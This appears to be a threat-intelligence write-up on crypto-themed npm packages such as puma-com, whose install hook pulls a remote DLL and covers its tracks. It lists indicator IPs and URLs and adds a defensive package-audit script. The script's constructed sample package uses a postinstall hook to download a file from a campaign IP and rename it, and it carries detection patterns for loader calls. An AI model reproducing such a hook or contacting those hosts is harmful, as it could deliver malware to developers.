Crypto-Themed npm Packages Found Delivering Stealthy Malware
On October 30, 2023 Phylum’s automated risk detection platform alerted us to a strange publication to npm called puma-com. Upon investigation, we found a very convoluted attack chain that ultimately pulled a remote file, manipulated it in place, called an exported function from that file, and then meticulously covered its tracks by removing and renaming files all along the way. Since then we’ve been tracking four additional packages belonging to this campaign as well. We are currently reverse engineering the DLL, but it is already flagged by 20 vendors on VirusTotal, so we’re sure it’s up to no good. Join us as we unravel this convoluted attack.
Background
What’s clever about this attack is that if you install this package and then go take a look at its contents you won’t see any malware. That’s because the installation of the package itself triggers not only the malware deployment, but …
IoC
103.179.142.171
91.206.178.125
http://103.179.142.171/files/npm.mov
http://103.179.142.171/npm/npm.mov
http://91.206.178.125/files/npm.mov
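The two facts that matter for defenders here are that the payload is triggered by the install itself (an npm lifecycle hook, so the malware runs before anyone reads the package) and that the stage-two file is fetched from the hosts listed above. The following is an added example, not Phylum’s tooling or the contents of puma-com: a small Node audit that takes a package’s files as an in-memory map, reports install-time hooks in package.json, matches file contents against the published IoCs, and heuristically flags the primitives a loader like this needs (remote fetch, file rename/unlink, process spawning). The heuristic pattern list, the `example-pkg` sample package and its `index.js` are assumptions constructed for the example; only the IoC values come from the write-up.

```javascript
// Added example: audit an npm package for install-time hooks and known IoCs.
// Not code from the Phylum write-up or from the puma-com package.

// Network IoCs published with the write-up.
const CAMPAIGN_IOCS = [
  '103.179.142.171',
  '91.206.178.125',
  'http://103.179.142.171/files/npm.mov',
  'http://103.179.142.171/npm/npm.mov',
  'http://91.206.178.125/files/npm.mov',
];

// Scripts npm runs on its own during `npm install`; a malicious package
// needs one of these to execute without the developer opening a file.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic loader primitives (an assumption of this example, not a list
// from the write-up): fetch a remote file, rename/delete files, spawn.
const SUSPICIOUS_CALLS = [
  /\bhttps?\.get\s*\(/,
  /\bfetch\s*\(/,
  /\bchild_process\b/,
  /\bfs\.(rename|unlink|rm)(Sync)?\s*\(/,
];

function findLifecycleHooks(packageJson) {
  const scripts = packageJson.scripts || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// files: { relativePath: fileContents }. Returns every (path, ioc) match.
function scanForIocs(files, iocs = CAMPAIGN_IOCS) {
  const hits = [];
  for (const [path, content] of Object.entries(files)) {
    for (const ioc of iocs) {
      if (content.includes(ioc)) hits.push({ path, ioc });
    }
  }
  return hits;
}

function scanForSuspiciousCalls(files) {
  const hits = [];
  for (const [path, content] of Object.entries(files)) {
    if (!path.endsWith('.js')) continue;
    for (const re of SUSPICIOUS_CALLS) {
      if (re.test(content)) hits.push({ path, pattern: re.source });
    }
  }
  return hits;
}

function auditPackage(files) {
  let pkg = {};
  try {
    pkg = JSON.parse(files['package.json'] || '{}');
  } catch (e) {
    // Malformed package.json: treat as having no scripts.
  }
  const hooks = findLifecycleHooks(pkg);
  const iocHits = scanForIocs(files);
  const suspicious = scanForSuspiciousCalls(files);
  // A known IoC is conclusive; a hook combined with loader primitives
  // is worth a human look; a bare hook is common but still worth noting.
  let verdict = 'clean';
  if (iocHits.length > 0) verdict = 'malicious';
  else if (hooks.length > 0 && suspicious.length > 0) verdict = 'review';
  else if (hooks.length > 0) verdict = 'has-install-hook';
  return { hooks, iocHits, suspicious, verdict };
}

// Constructed sample (NOT the real puma-com contents): a postinstall hook
// that downloads the stage-two file from a campaign host and renames it.
const SAMPLE_PACKAGE = {
  'package.json': JSON.stringify({
    name: 'example-pkg',
    version: '1.0.0',
    scripts: { postinstall: 'node index.js' },
  }),
  'index.js': [
    "const http = require('http');",
    "const fs = require('fs');",
    "http.get('http://103.179.142.171/files/npm.mov', (res) => {",
    "  res.pipe(fs.createWriteStream('npm.mov')).on('finish', () => {",
    "    fs.renameSync('npm.mov', 'stage2.bin');",
    '  });',
    '});',
  ].join('\n'),
};

// Constructed control package with no hooks and no network activity.
const CLEAN_PACKAGE = {
  'package.json': JSON.stringify({ name: 'tidy-pkg', version: '1.0.0' }),
  'index.js': 'module.exports = (a, b) => a + b;',
};

console.log(JSON.stringify(auditPackage(SAMPLE_PACKAGE), null, 2));
console.log(JSON.stringify(auditPackage(CLEAN_PACKAGE), null, 2));
```

To run this against a real package, build the `files` map from an extracted tarball (`npm pack <name>` followed by reading `package/**`) rather than from the installed `node_modules` copy, since this campaign deletes and renames its own files after the hook runs; the on-disk remains will not show what executed. Substring matching on the bare IP addresses is intentionally loose and will also fire on the full URLs, which is why the sample reports two hits for one download line.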